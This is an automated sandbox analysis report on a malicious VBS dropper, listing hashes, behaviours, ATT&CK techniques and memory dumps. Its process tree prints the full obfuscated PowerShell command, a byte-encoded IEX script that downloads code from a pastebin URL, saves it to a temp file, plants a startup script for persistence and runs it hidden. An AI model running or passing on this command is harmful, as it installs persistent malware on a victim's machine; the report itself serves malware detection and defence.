99b9e3b1e096a9e19fbf0eabc7d414045121dc10a2cd825eea5b2ee3465621ee

General

Target

99b9e3b1e096a9e19fbf0eabc7d414045121dc10a2cd825eea5b2ee3465621ee.vbs
Size

135KB
MD5

ee2fb6446ec3ac180286e25365b202b3
SHA1

6bd0bf5b4d0cea86979de7d5b78937c2ff4ee778
SHA256

99b9e3b1e096a9e19fbf0eabc7d414045121dc10a2cd825eea5b2ee3465621ee
SHA512

8e33769206cb7cb5a2655cdc18fba9087bdbfff0de4637d85d5837b36c529ddfb1b69c7424c7d18e38cb8ac106133c9cac2178abc50b8a119f7ae456bac2de27

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://pastebin.com/raw/3mS4sRnV

Signatures

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

5 868 powershell.exe
Drops startup file 1 IoCs

Processes:

powershell.exe

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SystemLogin32Bits89.vbs powershell.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exepowershell.exe

pid process

868 powershell.exe
1792 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 868 powershell.exe
Token: SeDebugPrivilege 1792 powershell.exe

flow	pid	process
5	868	powershell.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SystemLogin32Bits89.vbs	powershell.exe

pid	process
868	powershell.exe
1792	powershell.exe

description	pid	process
Token: SeDebugPrivilege	868	powershell.exe
Token: SeDebugPrivilege	1792	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

Processes:

WScript.exepowershell.exe

description	pid	process	target process
PID 1308 wrote to memory of 868	1308	WScript.exe	powershell.exe
PID 1308 wrote to memory of 868	1308	WScript.exe	powershell.exe
PID 1308 wrote to memory of 868	1308	WScript.exe	powershell.exe
PID 868 wrote to memory of 1792	868	powershell.exe	powershell.exe
PID 868 wrote to memory of 1792	868	powershell.exe	powershell.exe
PID 868 wrote to memory of 1792	868	powershell.exe	powershell.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\99b9e3b1e096a9e19fbf0eabc7d414045121dc10a2cd825eea5b2ee3465621ee.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1308

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WINDOWSTYLE HIDDEN -EXECUTIONPOLICY UNRESTRICTED -COMMAND IEX ([System.Text.Encoding]::UTF8.GetString(@(35,82,101,97,100,32,67,111,110,116,101,110,116,32,79,102,32,80,111,119,101,114,83,104,101,108,108,32,70,105,108,101,32,33,13,10,91,83,121,115,116,101,109,46,73,79,46,83,116,114,101,97,109,93,32,36,83,116,114,101,97,109,32,61,32,40,78,101,119,45,79,98,106,101,99,116,32,83,121,115,116,101,109,46,78,101,116,46,87,101,98,67,108,105,101,110,116,41,46,79,112,101,110,82,101,97,100,40,34,104,116,116,112,115,58,47,47,112,97,115,116,101,98,105,110,46,99,111,109,47,114,97,119,47,51,109,83,52,115,82,110,86,34,41,13,10,91,83,121,115,116,101,109,46,73,79,46,83,116,114,101,97,109,82,101,97,100,101,114,93,32,36,83,82,32,61,32,78,101,119,45,79,98,106,101,99,116,32,83,121,115,116,101,109,46,73,79,46,83,116,114,101,97,109,82,101,97,100,101,114,32,36,83,116,114,101,97,109,13,10,91,83,116,114,105,110,103,93,32,36,82,101,113,32,61,32,36,83,82,46,82,101,97,100,84,111,69,110,100,40,41,13,10,13,10,91,83,121,115,116,101,109,46,84,104,114,101,97,100,105,110,103,46,84,104,114,101,97,100,93,58,58,83,108,101,101,112,40,54,48,48,48,41,13,10,13,10,35,67,114,101,97,116,101,32,80,111,119,101,114,83,104,101,108,108,32,70,105,108,101,32,79,110,32,72,97,114,100,32,68,105,115,107,32,33,13,10,91,83,116,114,105,110,103,93,32,36,84,69,77,80,32,61,32,36,101,110,118,58,84,69,77,80,32,43,32,34,92,34,32,43,32,34,83,121,115,84,114,97,121,46,80,83,49,34,13,10,91,83,121,115,116,101,109,46,73,79,46,70,105,108,101,93,58,58,87,114,105,116,101,65,108,108,84,101,120,116,40,36,84,69,77,80,44,32,36,82,101,113,41,13,10,13,10,35,83,116,97,114,116,117,112,32,73,110,115,116,97,108,108,97,116,105,111,110,13,10,70,117,110,99,116,105,111,110,32,73,78,83,84,65,76,76,40,41,32,123,13,10,32,32,32,32,91,83,116,114,105,110,103,93,32,36,86,66,83,82,117,110,32,61,32,91,83,121,115,116,101,109,46,84,101,120,116,46,69,110,99,111,100,105,110,103,93,58,58,68,101,102,97,117,108,116,46,71,101,116,83,116,114,105,110,103,40,64,40,56,51,44,49,48,49,44,49,49,54,44,51,50,44,55,57,44,57,56,44,49,48,54,44,51,50,44,54,49,44,51,50,44,54,55,44,49,49,52,44,49,48,49,44,57,55,44,49,49,54,44,49,48,49,44,55,57,44,57,56,44,49,48,54,44,49,48,49,44,57,57,44,49,49,54,44,52,48,44,51,52,44,56,55,44,56,51,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,44,52,54,44,56,51,44,49,48,52,44,49,48,49,44,49,48,56,44,49,48,56,44,51,52,44,52,49,44,49,51,44,49,48,44,55,57,44,57,56,44,49,48,54,44,52,54,44,56,50,44,49,49,55,44,49,49,48,44,51,50,44,51,52,44,56,48,44,49,49,49,44,49,49,57,44,49,48,49,44,49,49,52,44,56,51,44,49,48,52,44,49,48,49,44,49,48,56,44,49,48,56,44,51,50,44,52,53,44,54,57,44,49,50,48,44,49,48,49,44,57,57,44,49,49,55,44,49,49,54,44,49,48,53,44,49,49,49,44,49,49,48,44,56,48,44,49,49,49,44,49,48,56,44,49,48,53,44,57,57,44,49,50,49,44,51,50,44,56,50,44,49,48,49,44,49,48,57,44,49,49,49,44,49,49,54,44,49,48,49,44,56,51,44,49,48,53,44,49,48,51,44,49,49,48,44,49,48,49,44,49,48,48,44,51,50,44,52,53,44,55,48,44,49,48,53,44,49,48,56,44,49,48,49,44,51,50,44,51,52,44,51,50,44,51,56,44,51,50,44,51,52,44,51,55,44,55,48,44,49,48,53,44,49,48,56,44,49,48,49,44,56,48,44,57,55,44,49,49,54,44,49,48,52,44,51,55,44,51,52,44,52,52,44,51,50,44,52,56,41,41,13,10,32,32,32,32,91,83,121,115,116,101,109,46,73,79,46,70,105,108,101,93,58,58,87,114,105,116,101,65,108,108,84,101,120,116,40,40,91,83,121,115,116,101,109,46,69,110,118,105,114,111,110,109,101,110,116,93,58,58,71,101,116,70,111,108,100,101,114,80,97,116,104,40,55,41,32,43,32,34,92,83,121,115,116,101,109,76,111,103,105,110,51,50,66,105,116,115,56,57,46,118,98,115,34,41,44,32,36,86,66,83,82,117,110,46,82,101,112,108,97,99,101,40,34,37,70,105,108,101,80,97,116,104,37,34,44,32,36,84,69,77,80,41,41,13,10,125,13,10,13,10,91,83,121,115,116,101,109,46,84,104,114,101,97,100,105,110,103,46,84,104,114,101,97,100,93,58,58,83,108,101,101,112,40,49,48,48,48,41,13,10,13,10,35,82,117,110,32,80,111,119,101,114,83,104,101,108,108,32,70,105,108,101,32,33,13,10,73,78,83,84,65,76,76,13,10,73,69,88,32,34,80,111,119,101,114,83,104,101,108,108,46,101,120,101,32,45,87,105,110,100,111,119,83,116,121,108,101,32,72,105,100,100,101,110,32,45,69,120,101,99,117,116,105,111,110,80,111,108,105,99,121,32,82,101,109,111,116,101,83,105,103,110,101,100,32,45,70,105,108,101,32,36,84,69,77,80,34)))
2⤵
- Blocklisted process makes network request
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:868

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy RemoteSigned -File C:\Users\Admin\AppData\Local\Temp\SysTray.PS1
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1792

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

1

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\SysTray.PS1
MD5
2bd198d265d67c9f4021eca5bb341900

SHA1
e3559a0d69e988877ce69d66b69cb41619521272

SHA256
721e44289afb034e90a67fb97eb5efd4d469bc95ba9863f16aed5e5909c76c61

SHA512
fa00e4b59b41ccbe865d342815001262323db96f99ebd30b1a5728111f9959c2e2775a5f279652649505ad23afe7a5551a705c650b985829cd2690f92f50e8f4

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
696dd7a3d020d77c7e8a466703544b71

SHA1
22c61b33f762ff619dbc0e4fce3d84ab22c9c497

SHA256
e9dcb90b012d16bb90c06e5b2d76850b2f3fd86d8bf0a8f12755018bafb5e5e9

SHA512
9f9bbc1aada6ef9561912e471a272724a914af9a810cd953db0b61b5f8d54238ca3d34427b0d0ebde37601a6ca311729822f57e11cdca05a00a241458a1b76b4

Download Submit
memory/868-57-0x0000000002460000-0x0000000002462000-memory.dmp

Filesize
8KB

Download
memory/868-59-0x0000000002464000-0x0000000002467000-memory.dmp

Filesize
12KB

Download
memory/868-58-0x0000000002462000-0x0000000002464000-memory.dmp

Filesize
8KB

Download
memory/868-55-0x000007FEF3680000-0x000007FEF41DD000-memory.dmp

Filesize
11.4MB

Download
memory/868-56-0x000007FEF5DAE000-0x000007FEF5DAF000-memory.dmp

Filesize
4KB

Download
memory/868-60-0x000000000246B000-0x000000000248A000-memory.dmp

Filesize
124KB

Download
memory/868-54-0x000007FEFC2B1000-0x000007FEFC2B3000-memory.dmp

Filesize
8KB

Download
memory/1792-63-0x000007FEF3680000-0x000007FEF41DD000-memory.dmp

Filesize
11.4MB

Download
memory/1792-67-0x0000000002492000-0x0000000002494000-memory.dmp

Filesize
8KB

Download
memory/1792-68-0x0000000002494000-0x0000000002497000-memory.dmp

Filesize
12KB

Download
memory/1792-65-0x000007FEF5DAE000-0x000007FEF5DAF000-memory.dmp

Filesize
4KB

Download
memory/1792-64-0x000000001B700000-0x000000001B9FF000-memory.dmp

Filesize
3.0MB

Download
memory/1792-66-0x0000000002490000-0x0000000002492000-memory.dmp

Filesize
8KB

Download
memory/1792-70-0x000000000249B000-0x00000000024BA000-memory.dmp

Filesize
124KB

Download

Analysis

Sharing